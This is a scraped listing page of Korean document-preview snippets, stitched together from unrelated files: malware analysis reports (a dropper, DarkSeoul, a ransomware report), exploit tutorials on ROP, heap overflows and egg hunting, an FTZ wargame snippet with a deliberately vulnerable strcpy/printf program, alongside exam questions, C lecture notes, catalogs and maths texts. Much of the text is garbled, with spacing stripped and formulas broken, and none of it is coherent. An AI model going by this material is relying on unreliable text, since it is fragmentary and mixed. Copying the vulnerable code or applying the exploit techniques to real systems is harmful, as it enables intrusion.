Dropper/Agent.97280.D Analysis 1. 개요잊을만하면한번씩사회공학기법 (Social Engineering) 을이용한악성코드가출현했다. 이번에는첨부파일인 Police.exe 를확인하고경찰서로출두하라는내용과함께불특정다수에게유포되었는데아마메일을받고도둑이제발저린다고순간뜨끔했던사용자들도있었을것이다. 이문서에서 Dropper/Agent.97280.D(
More information2005년 6월 고1 전국연합학력평가
제 1 교시 2015학년도 9월 모평 대비 EBS 리허설 2차 국어 영역(B형) 김철회의 1등급에 이르게 해 주는 [보기] 활용 문제 미니 모의고사(문학편) 1 유형편 [1]다음 글을 읽고 물음에 답하시오. 1. 를 참고하여 (가)를 이해할 때, 적절하지 않은 것은? (가) 머리는 이미 오래 전에 잘렸다 / 전깃줄에 닿지 않도록 올해는 팔다리까지 잘려
More informationMalware Analysis
Malware Analysis 악성코드분석 3.20 전산대란의주역 DarkSeoul.exe 에대하여알아보자. 3/21/2016 By Kali KM 2 Malware Analysis SAMPLE DETAILES Dropper File Name File Size MD5 SHA-1 DarkSeoul.exe 418 KB 9263E40D9823AECF9388B64DE34EAE54
More informationGSC Incident Report-바이킹 바이러스 분석
GSC Incident Report- 바이킹바이러스분석 1. 작성일시 : 2006.10.26 20:17(GMT +09:00) 2. 작성자 : 안창용 / 바이러스분석팀 3. 바이킹바이러스에대해서바이킹바이러스는 2005 년 2 월경최초발견된후잠시주춤하다가 2005 년 5 월부터국내에서웹해킹을통한악성코드유포사례가이슈화되면서 Internet Explorer 의취약성을공격하는
More information/* */
/*---------------------------------------------------------------------------------*/ 번역 : innovation@wowhacker.org /*---------------------------------------------------------------------------------*/
More information01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO
01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - POP; POP; POP; RET PLT & GOT Debug Proof of concept Example
More informationMPLAB C18 C
MPLAB C18 C MPLAB C18 MPLAB C18 C MPLAB C18 C #define START, c:\mcc18 errorlevel{0 1} char isascii(char ch); list[list_optioin,list_option] OK, Cancel , MPLAB IDE User s Guide MPLAB C18 C
More informationPress Arbitration Commission 62
제 2 부 언론관련판결 사례 제1장 명예훼손 사례 제2장 재산권 침해 사례 제3장 기타 인격권 침해 사례 제4장 형사 사례 제5장 헌법재판소 결정 사례 편집자 주 - 사건관계인의 인격권을 보호하기 위해 필요한 경우 사건관계인의 이름, 소속회사, 주 소, 차량번호 등을 비실명 익명처리하고 필요한 경우 최소한의 범위내에서 판결문의 일부를 수정 또는 삭제함을 알려드립니다.
More information금오공대 컴퓨터공학전공 강의자료
C 프로그래밍프로젝트 Chap 14. 포인터와함수에대한이해 2013.10.09. 오병우 컴퓨터공학과 14-1 함수의인자로배열전달 기본적인인자의전달방식 값의복사에의한전달 val 10 a 10 11 Department of Computer Engineering 2 14-1 함수의인자로배열전달 배열의함수인자전달방식 배열이름 ( 배열주소, 포인터 ) 에의한전달 #include
More informationMicrosoft PowerPoint - a9.ppt [호환 모드]
9.1 이장의내용 9 장. 스트링과배열 스트링프리미티브명령어 2 차원배열 정수배열검색및정렬 컴퓨터정보통신 어셈블리언어 2 9.2 스트링프리미티브명령어 String Primitive Instructions 의동작 String Primitive Instructions Instructions 설명 동작 MOVS(B,W,D) Move string data M[EDI]
More informationchap06.hwp
제 6 장대칭암호알고리즘 : AES 6.1 AES 6.1.1 AES 개요 1977년도에미국표준으로제정된 DES는지금까지큰허점이발견되지않았지만키길이가 56비트밖에되지않아현재의컴퓨팅기술로는쉽게전사공격을하여암호해독을할수있다. 따라서 1997년에새표준에대한작업을시작하여 2000년 10월에 AES(Advanced Encryption Standard) 라는새표준을채택하였다.
More informationA C O N T E N T S A-132
C O N T E N T S -2 SC2 Series -3 SC2 Series -4 SC2 Series SC2 B 40 B 100 S I SC2 B 40 B 100 RO R S I SC2-2 B 40 B 100 HOY R S I -5 SC2 R0 40 SW R0 SC2 R 40 SC2 Series SW RB SW R SC2-2 H0 40 SW H0 SC2-2
More informationEureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg
익스플로잇실습 / 튜토리얼 Eureka Mail Client 2.2q Omelet Egg Hunting By WraithOfGhost Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python 2.7.10 - Ollydbg
More information2 KAIST 1988,,KAIST MathLetter, 3,,, 3,, 3, 3,
(M 2 ) 2 KAIST 1988,,KAIST MathLetter, 3,,, 3,, 3, 3, 3,,, 2003 8, 4 1 7 11 8 12 26 2 39 21 40 22 54 23 67 24 80 3 93 31 n! 94 32 101 33 115 4 131 41 132 6 42 146 5 163 51 164 52 180 1 8 11 4 4?!,? 2??,?
More information미통기-3-06~07(052~071)
06 F() f() F'()=f()F() f() : f()d f() f() f() f() F()f() F()+C : f()d=f()+c C F'()=f(): f()d=f()+c C d [: f()d]=f() d : k d=k+c k C : «d= + +C =0C + : k f()d=k: f()d k : { f() g()}d=: f()d : g()d =f()
More informationMicrosoft Word - FunctionCall
Function all Mechanism /* Simple Program */ #define get_int() IN KEYOARD #define put_int(val) LD A val \ OUT MONITOR int add_two(int a, int b) { int tmp; tmp = a+b; return tmp; } local auto variable stack
More informationPowerPoint 프레젠테이션
Reverse Engineering Basics IA32 Basics CPU(Central Processing Units) 의구조 ALU Register EAX s EBX ECX EDX ESI EDI ESP EBP Control Unit EIP IR Eflags I/O Unit Data Bus Address Bus IA32 Register What is Register?
More informationA Dynamic Grid Services Deployment Mechanism for On-Demand Resource Provisioning
C Programming Practice (II) Contents 배열 문자와문자열 구조체 포인터와메모리관리 구조체 2/17 배열 (Array) (1/2) 배열 동일한자료형을가지고있으며같은이름으로참조되는변수들의집합 배열의크기는반드시상수이어야한다. type var_name[size]; 예 ) int myarray[5] 배열의원소는원소의번호를 0 부터시작하는색인을사용
More informationAD AD 8-0 / A A-2 / A A A-5 / A A T-T / Q
8-0 / 1-00... 002 A-1..... 003 A-2 / A-3....... 004 A-4..... 007 A-5 / A-6..... 012 A-8..... 016 T-T / Q-7... 017 1 8-0 1986-1991 20-5083-A5 RH 20-5084-A5 LH 893941030 893941029 HE LAMP B TYPE 18-5143-05
More information<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F >
10주차 문자 LCD 의인터페이스회로및구동함수 Next-Generation Networks Lab. 5. 16x2 CLCD 모듈 (HY-1602H-803) 그림 11-18 19 핀설명표 11-11 번호 분류 핀이름 레벨 (V) 기능 1 V SS or GND 0 GND 전원 2 V Power DD or V CC +5 CLCD 구동전원 3 V 0 - CLCD 명암조절
More informationScanned by CamScanner
Scanned by CamScanner Scanned by CamScanner ABCBDEFFEAFFE FBFAEAAF 1. A BCDE CE FC AECFCE C C F F DEEFDEEFCECDCFEFCFAEFCEECEBB FECECECAFDFCEFFE CCFFCFFFACCEFA EF 2. EEFCCFCEFFAFADCAAABCDECE FFA 3. CECFBEFCCECFFCEC
More informationMicrosoft PowerPoint - a8a.ppt [호환 모드]
이장의내용 8 장고급프로시저 스택프레임 재귀 (Recursion) Invoke, Addr, Proc, Proto 디렉티브 다중모듈프로그램작성 2 8.2 스택프레임 Stack Frame ( 또는 activation record) procedure 의다음사항을저장한 영역 urn address passed parameter ( 스택매개변수 ) saved register
More informationMicrosoft PowerPoint - a5a.ppt [호환 모드]
5 장프로시저 (1) 책의라이브러리사용 5 장전반부 : 책의링크라이브러리 외부링크라이브러리개요 라이브러리프로시저호출 라이브러리링크 라이브러리프로시저 예제 연세대학교컴퓨터정보통신어셈블리언어 2 저자제공링크라이브러리 라이브러리파일 어셈블된프로시저를포함하고있는 OBJ 파일들을모아놓은파일 ( 확장자.LIB) 각 OBJ file 에는하나이상의 procedure 가들어있음
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture3-2 Malware Analysis #3-2 Agenda 안드로이드악성코드분석 악성코드분석 안드로이드악성코드정적분석 APK 추출 #1 adb 명령 안드로이드에설치된패키지리스트추출 adb shell pm list packages v0nui-macbook-pro-2:lecture3 v0n$
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More informationReusing Dynamic Linker For Exploitation Author : Date : 2012 / 05 / 13 Contact : Facebook : fb.me/kwonpwn
Reusing Dynamic Linker For Exploitation Author : pwn3r @ B10S @WiseGuyz Date : 2012 / 05 / 13 Contact : austinkwon2@gmail.com Facebook : fb.me/kwonpwn3r Abstract 대부분의 Unix 에선공유라이브러리를메모리에로드하고프로그램과 link
More informationHeap Overflow By WraithOfGhost
Heap Overflow - 103 By WraithOfGhost 시간이지남에따라잊혀지지않았으면하는힙공격을위한매우중요한 기법을설명하고자한다. 지금까지다룬문서의내용을간단하게정리하면 다음과같다. Heap Overflows 101 [ Windows XP SP1 이하환경에서의기본적인힙오버플로우 ] - 기본적인 unlink() 공격 + 함수포인터덮어쓰기 - 처리되지않은예외필터이용
More informationHeap Overflow By WraithOfGhost
Heap Overflow - 101 By WraithOfGhost 이전스택오버플로우문서에서예외처리핸들러 (Exception Handler) 를호출하거나직접적인방법을 EIP 레지스터를제어하는방법을보여주었다. 본문서는 EIP / SEH를직접이용하지않고프로그램의실행흐름을제어하는일련의방법들에대하여다룰예정이다. 공격자가정한값을원하는메모리주소에덮어씀으로써임의의 DWORD
More informationuntitled
(2010년도 행감 - 사문1) 1 2010년도 사회문화위원회회의록 강원도의회사무처 피감사기관 : 공보관실 일 시 : 2010년 11월 17일 (수) 오전 10시 장 소 : 사회문화위원회회의실 (10시 00분 감사개시) 위원장 김동자 : 좌석을 정돈하여 주시기 바랍니다. 성원이 되었으므로 지금부터 지방자치법 제41조 및 동법시행령 제39조와 강원도의 회 행정사무감사
More informationMicrosoft PowerPoint - hy2-12.pptx
2.4 명령어세트 (instruction set) 명령어세트 CPU 가지원하는기계어명령어들의집합 명령어연산의종류 데이터전송 : 레지스터 / 메모리간에데이터이동 산술연산 : 덧셈, 뺄셈, 곱셈및나눗셈 논리연산 : 비트들간의 AND, OR, NOT 및 XOR 연산 입출력 (I/O) : CPU( 레지스터 ) 와외부장치들간의데이터이동 프로그램제어 : 분기, 서브루틴호출
More information: C, Y, =0, (Crook et al.(2007) ) ( ) 1 2 3 4 5 966 967 967 967 967 4,834 234 383 462 516 508 2,103 (A) 1 661 1,629 2,623 3,802 7,613 3,806 1,040 1,636 2,175 2,788 4,193 2,629 (B) 2,128 2,676 3,492
More informationCogame 취약점 보고
Frist Version: 2006. 01. 07 Last Version: 2006. 01. 19 anesra@{null2root.org, gmail.com Table of Contents 1. 기본개념과도구...3 1.1 윈도우쉘코드... 3 1.2 윈도우메모리 LAYOUT... 4 1.3 레지스터... 4 1.4 기본어셈블리어명령어... 4 2. 쉘코드만들기...6
More information0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1
FTZ LEVEL11 #include #include int main( int argc, char *argv[] ) { char str[256]; setreuid( 3092, 3092 ); strcpy( str, argv[1] ); printf( str ); gdb 를이용해분석해보면 [level11@ftz level11]$
More information<4D F736F F F696E74202D20B8AEB4AABDBA20BFC0B7F920C3B3B8AEC7CFB1E22E BC8A3C8AF20B8F0B5E55D>
리눅스 오류처리하기 2007. 11. 28 안효창 라이브러리함수의오류번호얻기 errno 변수기능오류번호를저장한다. 기본형 extern int errno; 헤더파일 라이브러리함수호출에실패했을때함수예 정수값을반환하는함수 -1 반환 open 함수 포인터를반환하는함수 NULL 반환 fopen 함수 2 유닉스 / 리눅스 라이브러리함수의오류번호얻기 19-1
More informationhwp
최종연구보고서 - 1 - - 1 - - 2 - - 3 - - 4 - - 5 - - 6 - - 7 - - 8 - - 9 - - 10 - - 11 - - 12 - - 13 - - 14 - - 15 - - 16 - - 17 - - 18 - - 19 - - 20 - - 21 - - 22 - - 23 - - 24 - - 25 - - 26 - - 27 - - 28 -
More informationG5 G25 H5 I5 J5 K5 AVERAGE B5 F5 AVERAGE G5 G24 MAX B5 F5 MIN B5 F5 $G$25 0.58 $H$25 $G$25 $G$25 0.58 $H$25 G24 H25 H24 I24 J24 K24 A5 A24 G5 G24, I5
C15 B6 B12 / B6 B7 C16 F6 F12 / F6 F7 G16 C16/C15 1 C18 B6 B12 / B6 B8 B9 C19 F6 F12 / F6 F8 F9 G19 C19/C18 1 1 G5 G25 H5 I5 J5 K5 AVERAGE B5 F5 AVERAGE G5 G24 MAX B5 F5 MIN B5 F5 $G$25 0.58 $H$25 $G$25
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More informationhlogin7
0x07. Return Oriented Programming ROP? , (DEP, ASLR). ROP (Return Oriented Programming) (excutable memory) rop. plt, got got overwrite RTL RTL Chain DEP, ASLR gadget Basic knowledge plt, got call function
More information제목을 입력하세요
기술문서 13. 10. 31. 작성 320 사이버대란복구 2013-04-30 fatapple 목차 1. 개요...3 2. 복구...4 2.1 MBR... 4 2.2 VBR... 9 2.3 복구 Tool...13 3. 결론... 16 4. 참고문헌... 17 2 1. 개요 이번 320 사이버대란에서주관심사는손실된저장매체의 Data였다. 피해를입은여러기업의 PC들의
More information1. 개요 MyCrackIt.exe 프로그램은기본적으로대화상자기반의윈도우용프로그램이다. 분석을위해서해당프로그램에서사용되는 API에대한내용을사전에조사하게될경우빠른분석이가능하다. 따라서, 이번 MyCrackIt.exe 에서사용하는 API 함수에대해서사전에조사하는것이필요하며
2007 년 2 학기해킹및크래킹 분석자료 #1 MyCrackIt.exe 분석자료 분석대상프로그램다운로드 : http://crackmes.de 분석도구 : OllyDebugger 질문연락처 : kyegeun.kim@initech.com < 문서열람후질문이있을시에는상기메일주소로연락할것 > [ 1/34 ] 1. 개요 MyCrackIt.exe 프로그램은기본적으로대화상자기반의윈도우용프로그램이다.
More information0311 Cube PPT_최종.pdf
Ⅰ 소개 2. 역할 3. 장점 큐브는 모든 디지털 마케팅 툴의 집행 데이터를 분석해 주는 차이의 독자개발 솔루션입니다 타겟 유입단계부터 최종 세일즈 단계까지 집행 데이터 분석을 통해 효율적이며 안정적으로 목표 성과 달성을 지원합니다 4 2. 의 역할 유입, 방문, 구매, 전환 등 웹 방문자의 행동 패턴 및 캠페인 성과를 정량적으로 측정하여 Ⅰ 소개 최적화된
More information歯Ky2002w.PDF
1 geometry geometrein (geo :, metrein : )., (thles of miletus),.. < >,. 17 18. (nlytic geometry ),. 17. 18 2. 18 (differentil geometry ). 19 (priori) (non- eucliden geometry ),,,. 2 E 2 3 E 3. E 2 E 3
More informationIDA 5.x Manual 07.02.hwp
IDA 5.x Manual - Manual 01 - 영리를 목적으로 한 곳에서 배포금지 Last Update 2007. 02 이강석 / certlab@gmail.com 어셈블리어 개발자 그룹 :: 어셈러브 http://www.asmlove.co.kr - 1 - IDA Pro 는 Disassembler 프로그램입니다. 기계어로 되어있는 실행파일을 어셈블리언어
More information익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost
익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter 2.7.3 ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost Easy RM to MP3 Converter_v2.7.3을이용하여 ROP 공격에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional
More information<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>
i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,
More information<BDC3B8AEBEF320B9F8C8A320C0DBBCBA20B7E7C6BEC0BB20BBCCBEC6B3BBBCAD D466F E687770>
시리얼번호작성루틴을뽑아내서 Brute-Force 돌리기.. 작성일 : 2005년가을작성자 : graylynx (graylynx at gmail.com) 크랙미정보 GOAL : Find the correct password No patching allowed Difficulty : 2/10 This is an exercise on brute-attacking.
More information1 1 x + # 0 x - 6 x 0 # x # 2r sin2x- sin x = 4cos x r 3 r 2r 5 r 3r
# 0 0 # # si si cos # 0 # 0 ^ h ^h^h# 0 ^! 0, h ^h^h# 0 ^! 0, h si si cos sicos si cos si ^cos h ^cos h si ^cosh^cos h 0 ^sih^cos h 0 0 # # cos cos, ^ si! h,, ` 0 # 혼자하는수능수학 0 년대비 9 월 A B, y f^h f^h, 0
More information<근대이전> ⑴ 문명의 형성과 고조선의 성립 역사 학습의 목적, 선사 문화의 발전에서 국가 형성까지를 다룬다. 역사가 현재 우리의 삶과 긴밀하게 연결되었음을 인식하고, 역사적 상상력을 바탕으 로 선사 시대의 삶을 유추해 본다. 세계 여러 지역에서 국가가 형성되고 문 명
2009년 개정 교육과정에 따른 교과 교육과정 적용을 위한 중학교 역사 교과서 집필 기준 ⑴ 문명의 형성과 고조선의 성립 역사 학습의 목적, 선사 문화의 발전에서 국가 형성까지를 다룬다. 역사가 현재 우리의 삶과 긴밀하게 연결되었음을 인식하고, 역사적 상상력을 바탕으 로 선사 시대의 삶을 유추해 본다. 세계 여러 지역에서 국가가 형성되고 문 명이
More informationAsProtect MUP
2013-06-18 Lazly 목차 1. 목적 3 0x01. 문서의목적. 3 0x02. 문서에서다루는내용 3 2. 프로그램설명.. 4 0x01. AsProtect 설명. 4 3.... 5 0x01. Find OEP... 5 0x02. DUMP.. 7 0x03. 에러발생.. 9 0x04. 에러확인.. 11 4. 자동화기법. 14 0x01. 빈공간찾기. 14 0x02.
More information미적분-1.indd
k k k= k= =4 =-3 = +5- = - 3 P t =t -t +3t- t=3 (NASA) NASA 44 0 (Galilei, G. ; 564~64) C m f() f()=-4.9 +C(m) mm3m f () mf () mf () m.. -9.8 3. 3 f {}=-4.9@+3 f {}=-4.9@+ f {}=-4.9@+ f() f'() f() f()
More information<322EBCF8C8AF28BFACBDC0B9AEC1A6292E687770>
연습문제해답 5 4 3 2 1 0 함수의반환값 =15 5 4 3 2 1 0 함수의반환값 =95 10 7 4 1-2 함수의반환값 =3 1 2 3 4 5 연습문제해답 1. C 언어에서의배열에대하여다음중맞는것은? (1) 3차원이상의배열은불가능하다. (2) 배열의이름은포인터와같은역할을한다. (3) 배열의인덱스는 1에서부터시작한다. (4) 선언한다음, 실행도중에배열의크기를변경하는것이가능하다.
More informationMicrosoft PowerPoint - chap02-C프로그램시작하기.pptx
#include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의
More information슬라이드 1
Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치
More information121_중등RPM-1상_01해(01~10)ok
1-01 00 11 03 1804 4 05 3506 45 07 5 65 0001 000 0003 0004 0005 01 4 4 6 5 6 9 Í = + =,, Í=Í=Í = = Í Í Í,, 0006 0007 0008 0009 0010 0011 001 7c 5c 3, 3 3, 6, 6 +50 =180 =130 130 +90 +30 =180 =60 60 =60
More information특허청구의 범위 청구항 1 앵커(20)를 이용한 옹벽 시공에 사용되는 옹벽패널에 있어서, 단위패널형태의 판 형태로 구성되며, 내부 중앙부가 후방 하부를 향해 기울어지도록 돌출 형성되어, 전면이 오 목하게 들어가고 후면이 돌출된 결속부(11)를 형성하되, 이 결속부(11
(51) Int. Cl. (19) 대한민국특허청(KR) (12) 등록특허공보(B1) E02D 29/02 (2006.01) E02D 17/20 (2006.01) E02B 3/14 (2006.01) (21) 출원번호 10-2010-0089517 (22) 출원일자 2010년09월13일 심사청구일자 (56) 선행기술조사문헌 JP2006037700 A* KR100920461
More information기본서(상)해답Ⅰ(001~016)-OK
1 1 01 01 (1) () 5 () _5 (4) _5_7 1 05 (5) { } 1 1 { } (6) _5 0 (1), 4 () 10, () 6, 5 0 (1) 18, 9, 6, 18 1,,, 6, 9, 18 01 () 1,,, 4, 4 1,,, 4, 6, 8, 1, 4 04 (1) () () (4) 1 (5) 05 (1) () () (4) 1 1 1 1
More informationPowerPoint Template
BoF 원정대서비스 목차 환경구성 http://www.hackerschool.org/hs_boards/zboard.php?id=hs_notice&no=1170881885 전용게시판 http://www.hackerschool.org/hs_boards/zboard.php?id=bof_fellowship Putty War game 2 LOB 란? 해커스쿨에서제공하는
More information성도
시나이는 없다 김진호_제3시대그리스도교연구소 연구실장 지금 이 어느 때인데... 올해 전반기 개신교계를 뜨겁게 달군 하나의 이슈는 교회정관 개정 논란이었다. 몇몇 대형교회들이 정 관을 개정했거나 개정을 시도하고 있었는데, 이에 대해 개신교 시민단체들이 강력한 비판과 항의를 표한 것이다. 특히 사랑의교회의 정관 개정안이 그 논란을 더욱 격화시켰다. 이 교회는
More informationJVM 메모리구조
조명이정도면괜찮조! 주제 JVM 메모리구조 설미라자료조사, 자료작성, PPT 작성, 보고서작성. 발표. 조장. 최지성자료조사, 자료작성, PPT 작성, 보고서작성. 발표. 조원 이용열자료조사, 자료작성, PPT 작성, 보고서작성. 이윤경 자료조사, 자료작성, PPT작성, 보고서작성. 이수은 자료조사, 자료작성, PPT작성, 보고서작성. 발표일 2013. 05.
More informationdnu.pdf
ISODNU 1 ISO DNU/DNUL DNU DNUL 32 40 50 63 80 Gx G G Gy Gy G M10x1.25 M12x1.25 M16x1.5 M16x1.5 M20x1.5 M20x1.5 [mm] 19 21 23 23 30 30 4 [MPa] 1.2 [ C] 20 80 0.6MPa [N] 482 753 1178 1870 3015 4712 415 633
More information(Microsoft Word - \270\256\271\366\275\314 \271\370\277\252.doc)
Smashing the Signature (Korean Translation V.08-01 01) 안티바이러스의시그니쳐탐색기법을우회하기위해 PE 파일의 헤더및속성을수정하여코드섹션을암호화하는기법을소개함. Hacking Group OVERTIME MRB00 2008.09.10 Title:
More information2 A A Cs A C C A A B A B 15 A C 30 A B A C B. 1m 1m A. 1 C.1m P k A B u k GPS GPS GPS GPS 4 2
www.ebsi.co.kr 2 A A 1 133 Cs 1 11 1 A C C A A B A B 15 A C 30 A B A C B. 1m 1m A. 1 C.1m P k A B u k GPS GPS GPS GPS 4 2 www.ebsi.co.kr A B t B A ;2!;t v v= = (3_t)+(6_0.5t) v=4 m/s t+0.5t 3 m/s 6 m/s
More informationPowerPoint 프레젠테이션
Chapter 10 포인터 01 포인터의기본 02 인자전달방법 03 포인터와배열 04 포인터와문자열 변수의주소를저장하는포인터에대해알아본다. 함수의인자를값과주소로전달하는방법을알아본다. 포인터와배열의관계를알아본다. 포인터와문자열의관계를알아본다. 1.1 포인터선언 포인터선언방법 자료형 * 변수명 ; int * ptr; * 연산자가하나이면 1 차원포인터 1 차원포인터는일반변수의주소를값으로가짐
More informationMicrosoft Word - Reversing Engineering Code with IDA Pro-4-1.doc
Reverse Engineering Code with IDA Pro By Dan Kaminsky, Justin Ferguson, Jason Larsen, Luis Miras, Walter Pearce 정리 : vangelis(securityproof@gmail.com) 이글은 Reverse Engineering Code with IDA Pro(2008년출판
More information(001~042)개념RPM3-2(정답)
- 0 0 0 0 6 0 0 06 66 07 79 08 9 0 000 000 000 000 0 8+++0+7+ = 6 6 = =6 6 6 80+8+9+9+77+86 = 6 6 = =86 86 6 8+0++++6++ = 8 76 = = 8 80 80 90 00 0 + = 90 90 000 7 8 9 6 6 = += 7 +7 =6 6 0006 6 7 9 0 8
More information[ 마이크로프로세서 1] 2 주차 3 차시. 포인터와구조체 2 주차 3 차시포인터와구조체 학습목표 1. C 언어에서가장어려운포인터와구조체를설명할수있다. 2. Call By Value 와 Call By Reference 를구분할수있다. 학습내용 1 : 함수 (Functi
2 주차 3 차시포인터와구조체 학습목표 1. C 언어에서가장어려운포인터와구조체를설명할수있다. 2. Call By Value 와 Call By Reference 를구분할수있다. 학습내용 1 : 함수 (Function) 1. 함수의개념 입력에대해적절한출력을발생시켜주는것 내가 ( 프로그래머 ) 작성한명령문을연산, 처리, 실행해주는부분 ( 모듈 ) 자체적으로실행되지않으며,
More information2015 CodeGate 풀이보고서 김성우 1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다
2015 CodeGate 풀이보고서 김성우 rkwk0112@gmail.com http://cd80.tistory.com 1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다 argv[1] 의주소는스택에있으므로 cmd부터버퍼를오버플로우시켜 argv[1] 이저장된주소까지접근이가능하면 strlen(argv[1]); 시
More informationA 001~A 036
4 3 2 0 8 91 0 1 2 3 4 5 6 08 09 00 01 02 03 04 18 19 10 29 20 22 23 39 30 31 32 33 48 49 40 41 59 50 69 1 2 3 4 1 2 3 4 1 4 7 10 13 1 2 3 4 5 6 rev. C C r C a f h f h L h h nrpm f h f n L C 3 P L
More information